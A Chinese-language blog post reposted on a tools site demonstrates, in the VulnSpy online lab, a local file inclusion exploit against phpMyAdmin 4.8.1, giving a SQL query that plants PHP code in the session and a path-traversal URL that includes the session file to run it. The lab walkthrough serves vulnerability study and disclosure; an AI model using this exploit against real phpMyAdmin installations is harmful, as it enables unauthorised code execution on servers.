phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用

  • 2018-06-21 10:58
  • 阅读数 228


今天ChaMd5安全团队 <http://chamd5.org/>公开了一个phpMyAdmin最新版中的本地文件包含漏洞:
phpmyadmin4.8.1后台getshell
<https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&srcid=0621gAv1FMtrgoahD01psMZr&pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd>
。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。
 
在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境 <http://www.vulnspy.com/phpmyadmin-4.8.1/>
来演示该漏洞的利用。
 
VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/
<http://www.vulnspy.com/phpmyadmin-4.8.1/>

<https://bbs.pediy.com/thread-228693.htm#%E6%BC%8F%E6%B4%9E%E7%BB%86%E8%8A%82>
漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell
<https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&srcid=0621gAv1FMtrgoahD01psMZr&pass_ticket=LqhRfckPxAVG2dF%2FjxV%2F9%2FcEb5pShRgewJe%2FttJn2gIlIyGF%2FbsgGmzcbsV%2BLmMK#rd>

<https://bbs.pediy.com/thread-228693.htm#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8>
漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。
 
1. 进入VulnSpy 在线 phpMyAdmin 环境地址 <https://bbs.pediy.com/thread-228693.htm>,点击
Start to Hack ,跳转到VSPlate
 

 
2. 等待载入设置后,点击 GO 按钮开启实验
 

 
3. 实验创建完成后,点击演示地址进入实验
 

 
4. 使用帐号 root ,密码 toor 登录 phpMyAdmin
 

 
5. 点击顶部导航栏中的SQL按钮,执行SQL查询

1select '<?php phpinfo();exit;?>'

 
6. 获取自己的SESSION ID
 
你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。
 

 
这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID。
 
7. 包含SESSION文件,成功利用该漏洞

1http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php
%253f/../../../../../../../../var/lib/php/sessions/
sess_11njnj4253qq93vjm9q93nvc7p2lq82k

 
本文转载自:phpMyAdmin 4.8.x LFI Exploit - 
http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/
<http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/>

友情链接
KaDraw流程图
API参考文档
OK工具箱
云服务器优惠
阿里云优惠券
腾讯云优惠券
华为云优惠券
站点信息
问题反馈
邮箱:[email protected]
QQ群:637538335
关注微信
©2016-2024 Matools All rights reserved, 粤ICP备17059708号